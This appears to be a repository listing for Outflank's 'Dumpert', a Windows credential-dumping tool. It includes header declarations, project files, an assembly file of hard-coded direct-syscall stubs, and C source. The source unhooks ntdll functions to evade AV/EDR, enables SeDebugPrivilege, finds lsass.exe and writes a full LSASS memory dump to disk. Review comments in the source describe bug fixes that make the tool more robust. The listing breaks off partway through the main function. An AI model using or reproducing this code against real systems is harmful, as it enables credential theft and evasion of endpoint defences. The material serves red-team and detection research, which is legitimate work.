NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 118 | 
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 119 | EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 120 | 121 | 122 | // Windows 10 / Server 2016 specific Syscalls 123 | EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 124 | EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 125 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 126 | EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle); 127 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 128 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 129 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 130 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 131 | 132 | NTSTATUS(*NtAllocateVirtualMemory)( 133 | HANDLE ProcessHandle, 134 | PVOID 
*BaseAddress, 135 | ULONG_PTR ZeroBits, 136 | PSIZE_T RegionSize, 137 | ULONG AllocationType, 138 | ULONG Protect 139 | ); 140 | 141 | NTSTATUS(*NtFreeVirtualMemory)( 142 | HANDLE ProcessHandle, 143 | PVOID *BaseAddress, 144 | IN OUT PSIZE_T RegionSize, 145 | ULONG FreeType 146 | ); 147 | 148 | NTSTATUS(*ZwOpenProcess)( 149 | PHANDLE ProcessHandle, 150 | ACCESS_MASK DesiredAccess, 151 | POBJECT_ATTRIBUTES ObjectAttributes, 152 | PCLIENT_ID ClientId 153 | ); 154 | 155 | NTSTATUS(WINAPI *ZwQuerySystemInformation)( 156 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 157 | PVOID SystemInformation, 158 | ULONG SystemInformationLength, 159 | PULONG ReturnLength 160 | ); 161 | 162 | NTSTATUS(*ZwWriteVirtualMemory)( 163 | HANDLE hProcess, 164 | PVOID lpBaseAddress, 165 | PVOID lpBuffer, 166 | SIZE_T NumberOfBytesToRead, 167 | PSIZE_T NumberOfBytesRead 168 | ); 169 | 170 | NTSTATUS(*ZwProtectVirtualMemory)( 171 | IN HANDLE ProcessHandle, 172 | IN PVOID* BaseAddress, 173 | IN SIZE_T* NumberOfBytesToProtect, 174 | IN ULONG NewAccessProtection, 175 | OUT PULONG OldAccessProtection 176 | ); 177 | 178 | NTSTATUS(*NtCreateFile)( 179 | PHANDLE FileHandle, 180 | ACCESS_MASK DesiredAccess, 181 | POBJECT_ATTRIBUTES ObjectAttributes, 182 | PIO_STATUS_BLOCK IoStatusBlock, 183 | PLARGE_INTEGER AllocationSize, 184 | ULONG FileAttributes, 185 | ULONG ShareAccess, 186 | ULONG CreateDisposition, 187 | ULONG CreateOptions, 188 | PVOID EaBuffer, 189 | ULONG EaLength 190 | ); 191 | 192 | NTSTATUS(*ZwClose)( 193 | IN HANDLE KeyHandle 194 | ); 195 | 196 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 197 | LPOSVERSIONINFOEXW lpVersionInformation 198 | ); 199 | 200 | typedef void (WINAPI* _RtlInitUnicodeString)( 201 | PUNICODE_STRING DestinationString, 202 | PCWSTR SourceString 203 | ); 204 | 205 | typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)( 206 | PUNICODE_STRING String1, 207 | PCUNICODE_STRING String2, 208 | BOOLEAN CaseInSensitive 209 | ); 210 | 
-------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {307088B9-2992-4DE7-A57D-9E657B1CE546} 23 | OutflankDumpertDLL 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | MultiByte 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | MultiByte 39 | 40 | 41 | DynamicLibrary 42 | true 43 | v140 44 | MultiByte 45 | 46 | 47 | DynamicLibrary 48 | false 49 | v140 50 | true 51 | MultiByte 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | Disabled 77 | true 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | 86 | 87 | 88 | 89 | Level3 90 | MaxSpeed 91 | true 92 | true 93 | true 94 | 95 | 96 | true 97 | true 98 | 99 | 100 | 101 | 102 | Level3 103 | MaxSpeed 104 | true 105 | true 106 | true 107 | MultiThreaded 108 | 109 | 110 | true 111 | true 112 | false 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | 28 | 29 | Source Files 30 | 31 | 32 | 
-------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\Windows\System32\Rundll32.exe 5 | C:\Outflank\Development\Outflank-Dumpert-DLL\x64\Debug\Outflank-Dumpert-DLL.dll,Dump 6 | WindowsLocalDebugger 7 | 8 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL/Syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ 4 | 5 | ; Windows 7 SP1 / Server 2008 R2 specific syscalls 6 | 7 | ZwOpenProcess7SP1 proc 8 | mov r10, rcx 9 | mov eax, 23h 10 | syscall 11 | ret 12 | ZwOpenProcess7SP1 endp 13 | 14 | ZwClose7SP1 proc 15 | mov r10, rcx 16 | mov eax, 0Ch 17 | syscall 18 | ret 19 | ZwClose7SP1 endp 20 | 21 | ZwWriteVirtualMemory7SP1 proc 22 | mov r10, rcx 23 | mov eax, 37h 24 | syscall 25 | ret 26 | ZwWriteVirtualMemory7SP1 endp 27 | 28 | ZwProtectVirtualMemory7SP1 proc 29 | mov r10, rcx 30 | mov eax, 4Dh 31 | syscall 32 | ret 33 | ZwProtectVirtualMemory7SP1 endp 34 | 35 | ZwQuerySystemInformation7SP1 proc 36 | mov r10, rcx 37 | mov eax, 33h 38 | syscall 39 | ret 40 | ZwQuerySystemInformation7SP1 endp 41 | 42 | NtAllocateVirtualMemory7SP1 proc 43 | mov r10, rcx 44 | mov eax, 15h 45 | syscall 46 | ret 47 | NtAllocateVirtualMemory7SP1 endp 48 | 49 | NtFreeVirtualMemory7SP1 proc 50 | mov r10, rcx 51 | mov eax, 1Bh 52 | syscall 53 | ret 54 | NtFreeVirtualMemory7SP1 endp 55 | 56 | NtCreateFile7SP1 proc 57 | mov r10, rcx 58 | mov eax, 52h 59 | syscall 60 | ret 61 | NtCreateFile7SP1 endp 62 | 63 | ; Windows 8 / Server 2012 specific syscalls 64 | 65 | ZwOpenProcess80 proc 66 | mov r10, rcx 67 | mov eax, 24h 68 | syscall 69 | ret 70 | ZwOpenProcess80 endp 71 | 72 | ZwClose80 proc 73 | mov r10, rcx 74 | mov eax, 0Dh 75 
| syscall 76 | ret 77 | ZwClose80 endp 78 | 79 | ZwWriteVirtualMemory80 proc 80 | mov r10, rcx 81 | mov eax, 38h 82 | syscall 83 | ret 84 | ZwWriteVirtualMemory80 endp 85 | 86 | ZwProtectVirtualMemory80 proc 87 | mov r10, rcx 88 | mov eax, 4Eh 89 | syscall 90 | ret 91 | ZwProtectVirtualMemory80 endp 92 | 93 | ZwQuerySystemInformation80 proc 94 | mov r10, rcx 95 | mov eax, 34h 96 | syscall 97 | ret 98 | ZwQuerySystemInformation80 endp 99 | 100 | NtAllocateVirtualMemory80 proc 101 | mov r10, rcx 102 | mov eax, 16h 103 | syscall 104 | ret 105 | NtAllocateVirtualMemory80 endp 106 | 107 | NtFreeVirtualMemory80 proc 108 | mov r10, rcx 109 | mov eax, 1Ch 110 | syscall 111 | ret 112 | NtFreeVirtualMemory80 endp 113 | 114 | NtCreateFile80 proc 115 | mov r10, rcx 116 | mov eax, 53h 117 | syscall 118 | ret 119 | NtCreateFile80 endp 120 | 121 | ; Windows 8.1 / Server 2012 R2 specific syscalls 122 | 123 | ZwOpenProcess81 proc 124 | mov r10, rcx 125 | mov eax, 25h 126 | syscall 127 | ret 128 | ZwOpenProcess81 endp 129 | 130 | ZwClose81 proc 131 | mov r10, rcx 132 | mov eax, 0Eh 133 | syscall 134 | ret 135 | ZwClose81 endp 136 | 137 | ZwWriteVirtualMemory81 proc 138 | mov r10, rcx 139 | mov eax, 39h 140 | syscall 141 | ret 142 | ZwWriteVirtualMemory81 endp 143 | 144 | ZwProtectVirtualMemory81 proc 145 | mov r10, rcx 146 | mov eax, 4Fh 147 | syscall 148 | ret 149 | ZwProtectVirtualMemory81 endp 150 | 151 | ZwQuerySystemInformation81 proc 152 | mov r10, rcx 153 | mov eax, 35h 154 | syscall 155 | ret 156 | ZwQuerySystemInformation81 endp 157 | 158 | NtAllocateVirtualMemory81 proc 159 | mov r10, rcx 160 | mov eax, 17h 161 | syscall 162 | ret 163 | NtAllocateVirtualMemory81 endp 164 | 165 | NtFreeVirtualMemory81 proc 166 | mov r10, rcx 167 | mov eax, 1Dh 168 | syscall 169 | ret 170 | NtFreeVirtualMemory81 endp 171 | 172 | NtCreateFile81 proc 173 | mov r10, rcx 174 | mov eax, 54h 175 | syscall 176 | ret 177 | NtCreateFile81 endp 178 | 179 | ; Windows 10 / Server 2016 specific syscalls 
180 | 181 | ZwOpenProcess10 proc 182 | mov r10, rcx 183 | mov eax, 26h 184 | syscall 185 | ret 186 | ZwOpenProcess10 endp 187 | 188 | ZwClose10 proc 189 | mov r10, rcx 190 | mov eax, 0Fh 191 | syscall 192 | ret 193 | ZwClose10 endp 194 | 195 | ZwWriteVirtualMemory10 proc 196 | mov r10, rcx 197 | mov eax, 3Ah 198 | syscall 199 | ret 200 | ZwWriteVirtualMemory10 endp 201 | 202 | ZwProtectVirtualMemory10 proc 203 | mov r10, rcx 204 | mov eax, 50h 205 | syscall 206 | ret 207 | ZwProtectVirtualMemory10 endp 208 | 209 | ZwQuerySystemInformation10 proc 210 | mov r10, rcx 211 | mov eax, 36h 212 | syscall 213 | ret 214 | ZwQuerySystemInformation10 endp 215 | 216 | NtAllocateVirtualMemory10 proc 217 | mov r10, rcx 218 | mov eax, 18h 219 | syscall 220 | ret 221 | NtAllocateVirtualMemory10 endp 222 | 223 | NtFreeVirtualMemory10 proc 224 | mov r10, rcx 225 | mov eax, 1Eh 226 | syscall 227 | ret 228 | NtFreeVirtualMemory10 endp 229 | 230 | NtCreateFile10 proc 231 | mov r10, rcx 232 | mov eax, 55h 233 | syscall 234 | ret 235 | NtCreateFile10 endp 236 | 237 | end 238 | -------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert", "Outflank-Dumpert\Outflank-Dumpert.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 
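17 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64
18 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32
19 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32
20 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64
21 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64
22 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32
23 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 | 
-------------------------------------------------------------------------------- /Dumpert/Outflank-Dumpert/Dumpert.c: --------------------------------------------------------------------------------
#undef _UNICODE
#define _UNICODE
#undef UNICODE
#define UNICODE

/* NOTE(review): the angle-bracket header names were stripped from this listing and are
 * reconstructed from the APIs used below. windows.h has to precede Dumpert.h (HANDLE,
 * ULONG, ...) and dbghelp.h (MiniDumpWriteDump, linked through the pragma). */
#include <windows.h>
#include <stdio.h>
#include "Dumpert.h"
#include <dbghelp.h>

#pragma comment (lib, "Dbghelp.lib")


/*
 * Unhook_NativeAPI - restore the prologue of one ntdll syscall stub in the current
 * process so that a user-mode inline hook (the kind AV/EDR products place on the
 * export) is no longer executed when that API is called.
 *
 * The bytes written are the canonical x64 stub prologue, the same sequence the
 * stubs in Syscalls.asm use:
 *     4C 8B D1           mov r10, rcx
 *     B8 xx xx xx xx     mov eax, <system call number>
 * The system call number comes from pWinVerInfo->SystemCall (chosen per OS in
 * wmain); the export to patch is pWinVerInfo->lpApiCall. The write itself goes
 * through the direct-syscall stubs for ZwProtectVirtualMemory/ZwWriteVirtualMemory,
 * so the patch does not pass through any hooked ntdll export.
 *
 * Returns TRUE on success, FALSE when the OS version has no stub table, the export
 * cannot be resolved, or a memory call fails. The original page protection is put
 * back on every path once it has been changed.
 *
 * Limits: only these 8 bytes are restored. A hook that overwrote more of the stub
 * (e.g. a 14-byte absolute jmp) leaves corrupted bytes behind; nothing here
 * validates the remainder of the stub.
 */
BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
	BYTE AssemblyBytes[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x00, 0x00, 0x00, 0x00 };

	// Select the direct-syscall stubs for this OS (see Syscalls.asm).
	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
		ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
		ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
		ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
		ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
		ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
		ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
		ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
		ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
	}
	else {
		return FALSE;
	}

	// Write the whole little-endian imm32 of "mov eax, imm32". The original wrote only
	// the low byte and relied on the three bytes above it still being zero in ntdll.
	AssemblyBytes[4] = (BYTE)(pWinVerInfo->SystemCall & 0xFF);
	AssemblyBytes[5] = (BYTE)((pWinVerInfo->SystemCall >> 8) & 0xFF);
	AssemblyBytes[6] = (BYTE)((pWinVerInfo->SystemCall >> 16) & 0xFF);
	AssemblyBytes[7] = (BYTE)((pWinVerInfo->SystemCall >> 24) & 0xFF);

	// ntdll is always mapped; GetModuleHandle (as used elsewhere in this file) avoids
	// bumping its load count. Both lookups were unchecked before and would have fed
	// NULL into ZwProtectVirtualMemory.
	HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
	if (hNtdll == NULL) {
		wprintf(L" [!] ntdll.dll not found.\n");
		return FALSE;
	}
	LPVOID lpProcAddress = GetProcAddress(hNtdll, pWinVerInfo->lpApiCall);
	if (lpProcAddress == NULL) {
		printf(" [!] %s not found in ntdll.dll.\n", pWinVerInfo->lpApiCall);
		return FALSE;
	}

	printf(" [+] %s function pointer at: 0x%p\n", pWinVerInfo->lpApiCall, lpProcAddress);
	printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, pWinVerInfo->SystemCall);
	printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall);

	// Both in/out: the kernel rounds the range to page granularity, and the rounded
	// values are what the restoring call below must pass back in.
	LPVOID lpBaseAddress = lpProcAddress;
	ULONG OldProtection = 0, NewProtection = 0;
	SIZE_T uSize = sizeof(AssemblyBytes);
	NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
	if (status != STATUS_SUCCESS) {
		wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
		return FALSE;
	}

	NTSTATUS writeStatus = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);

	// Always restore the original protection, even when the write failed: the original
	// code returned early and left the ntdll page RWX in this process.
	status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);

	if (writeStatus != STATUS_SUCCESS) {
		wprintf(L" [!] ZwWriteVirtualMemory failed.\n");
		return FALSE;
	}
	if (status != STATUS_SUCCESS) {
		wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
		return FALSE;
	}

	return TRUE;
}

/*
 * GetPID - look up the process id of pWinVerInfo->ProcName ("lsass.exe", set by
 * wmain) with a direct NtQuerySystemInformation(SystemProcessInformation) call
 * instead of the Toolhelp/PSAPI wrappers.
 *
 * On success pWinVerInfo->hTargetPID holds the id (as the HANDLE-typed value the
 * kernel returns) and TRUE is returned. FALSE means: unsupported OS version, a
 * failed native call, or no process with that name. The query buffer is released
 * on every path.
 *
 * Fixes relative to the original:
 *   - the size-probe check was written "!status == 0xc0000004", which compares a
 *     0/1 value with the status and therefore never rejected anything;
 *   - the entry walk stopped on a NULL pointer, which never happens; the list is
 *     terminated by NextEntryDelta == 0, so an absent name spun forever;
 *   - the buffer leaked on the error paths between allocation and release.
 */
BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
	pWinVerInfo->hTargetPID = NULL;

	// Select the direct-syscall stubs for this OS (see Syscalls.asm).
	if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
		ZwQuerySystemInformation = &ZwQuerySystemInformation10;
		NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
		NtFreeVirtualMemory = &NtFreeVirtualMemory10;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
		ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
		NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
		NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
		ZwQuerySystemInformation = &ZwQuerySystemInformation80;
		NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
		NtFreeVirtualMemory = &NtFreeVirtualMemory80;
	}
	else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
		ZwQuerySystemInformation = &ZwQuerySystemInformation81;
		NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
		NtFreeVirtualMemory = &NtFreeVirtualMemory81;
	}
	else {
		return FALSE;
	}

	// Resolve the comparison helper before anything is allocated so that a missing
	// export cannot leak the buffer.
	_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
	if (RtlEqualUnicodeString == NULL) {
		return FALSE;
	}

	// Size probe: the expected outcome is STATUS_INFO_LENGTH_MISMATCH (0xC0000004)
	// with the required length in uReturnLength.
	ULONG uReturnLength = 0;
	NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &uReturnLength);
	if (status != (NTSTATUS)0xC0000004L || uReturnLength == 0) {
		return FALSE;
	}

	// The process list can grow between the probe and the real query; retry with the
	// newly reported length a few times rather than failing on the first mismatch.
	LPVOID pBuffer = NULL;
	SIZE_T uSize = 0;
	for (int attempt = 0; ; attempt++) {
		pBuffer = NULL;
		uSize = uReturnLength;
		status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
		if (status != STATUS_SUCCESS) {
			return FALSE;
		}
		// uSize has been rounded up to whole pages by the allocation; pass that size.
		status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, (ULONG)uSize, &uReturnLength);
		if (status == STATUS_SUCCESS) {
			break;
		}
		NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
		if (status != (NTSTATUS)0xC0000004L || attempt >= 3) {
			return FALSE;
		}
	}

	// Walk the entries. NextEntryDelta == 0 marks the last one; the extra bound check
	// keeps a malformed delta from reading past the committed region.
	LPBYTE pEnd = (LPBYTE)pBuffer + uSize;
	PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
	for (;;) {
		if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
			pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
			break;
		}
		if (pProcInfo->NextEntryDelta == 0) {
			break;
		}
		LPBYTE pNext = (LPBYTE)pProcInfo + pProcInfo->NextEntryDelta;
		if (pNext + sizeof(SYSTEM_PROCESSES) > pEnd) {
			break;
		}
		pProcInfo = (PSYSTEM_PROCESSES)pNext;
	}

	NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);

	return pWinVerInfo->hTargetPID != NULL;
}

/*
 * IsElevated - TRUE when the current process token is elevated (TokenElevation),
 * FALSE otherwise or when the token cannot be queried.
 */
BOOL IsElevated() {
	BOOL fRet = FALSE;
	HANDLE hToken = NULL;
	if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
		TOKEN_ELEVATION Elevation = { 0 };
		DWORD cbSize = sizeof(TOKEN_ELEVATION);
		if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
			fRet = Elevation.TokenIsElevated;
		}
	}
	if (hToken) {
		CloseHandle(hToken);
	}
	return fRet;
}

/*
 * SetDebugPrivilege - enable SeDebugPrivilege on the current process token; this is
 * what allows an elevated caller to open lsass for reading.
 * Returns FALSE when the token cannot be opened or the privilege cannot be looked
 * up or adjusted. (The "TRUE ? SE_PRIVILEGE_ENABLED : 0" below is a constant
 * expression and always yields SE_PRIVILEGE_ENABLED.)
 */
BOOL SetDebugPrivilege() {
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES TokenPrivileges = { 0 };

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
		return FALSE;
	}

	TokenPrivileges.PrivilegeCount = 1;
	TokenPrivileges.Privileges[0].Attributes = TRUE ?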
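SE_PRIVILEGE_ENABLED : 0;

	LPCWSTR lpwPriv = L"SeDebugPrivilege";
	if (!LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
		CloseHandle(hToken);
		return FALSE;
	}

	if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
		CloseHandle(hToken);
		return FALSE;
	}

	// AdjustTokenPrivileges returns TRUE even when the privilege is not held by the
	// token; ERROR_NOT_ALL_ASSIGNED in the last-error value is the real failure
	// signal, and it has to be read before CloseHandle overwrites it.
	BOOL assigned = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);

	CloseHandle(hToken);
	return assigned;
}


/*
 * wmain - entry point. Steps:
 *   1. refuse to run on anything but x64 and without an elevated token; try to
 *      enable SeDebugPrivilege;
 *   2. pick the OS-specific direct-syscall stubs (Syscalls.asm) based on
 *      RtlGetVersion. Only the major.minor (and 7601 for 6.1) is checked, so the
 *      hard-coded syscall numbers are assumed to hold for every build of that
 *      family; an unlisted version exits;
 *   3. locate lsass.exe and restore ntdll!NtReadVirtualMemory in this process;
 *   4. open lsass, create %WINDIR%\Temp\dumpert.dmp and write a full-memory
 *      minidump into it with MiniDumpWriteDump.
 *
 * The resulting file is a complete LSASS memory image (credential material). It is
 * left on disk on success and a partial file may be left on failure; the tool does
 * not remove it, so the operator must.
 *
 * Exit code is 0 when the dump was written, 1 otherwise. (The original returned
 * FALSE -- i.e. 0, "success" -- when RtlGetVersion could not be resolved and 0
 * even when MiniDumpWriteDump failed.)
 */
int wmain(int argc, wchar_t* argv[]) {
	(void)argc;
	(void)argv;

	wprintf(L" ________ __ _____.__ __ \n");
	wprintf(L" \\_____ \\ __ ___/ |__/ ____\\ | _____ ____ | | __ \n");
	wprintf(L" / | \\| | \\ __\\ __\\| | \\__ \\ / \\| |/ / \n");
	wprintf(L" / | \\ | /| | | | | |__/ __ \\| | \\ < \n");
	wprintf(L" \\_______ /____/ |__| |__| |____(____ /___| /__|_ \\ \n");
	wprintf(L" \\/ \\/ \\/ \\/ \n");
	wprintf(L" Dumpert \n");
	wprintf(L" By Cneeliz @Outflank 2019 \n\n");

	LPCWSTR lpwProcName = L"lsass.exe";

	// The syscall stubs are x64-only (mov r10, rcx / syscall).
	if (sizeof(LPVOID) != 8) {
		wprintf(L"[!] Sorry, this tool only works on a x64 version of Windows.\n");
		exit(1);
	}

	if (!IsElevated()) {
		wprintf(L"[!] You need elevated privileges to run this tool!\n");
		exit(1);
	}

	// Warn rather than abort: ZwOpenProcess below gives the definitive answer on
	// whether lsass can be opened.
	if (!SetDebugPrivilege()) {
		wprintf(L"[!] Could not enable SeDebugPrivilege, opening lsass may fail.\n");
	}

	PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
	if (pWinVerInfo == NULL) {
		wprintf(L"[!] Out of memory.\n");
		exit(1);
	}

	// First set OS Version/Architecture specific values
	OSVERSIONINFOEXW osInfo = { 0 };
	LPCWSTR lpOSVersion;
	osInfo.dwOSVersionInfoSize = sizeof(osInfo);

	// RtlGetVersion is used instead of GetVersionEx because it is not subject to
	// manifest-based version lying.
	_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
	if (RtlGetVersion == NULL) {
		wprintf(L"[!] RtlGetVersion not found in ntdll.dll.\n");
		exit(1);
	}

	wprintf(L"[1] Checking OS version details:\n");
	RtlGetVersion(&osInfo);
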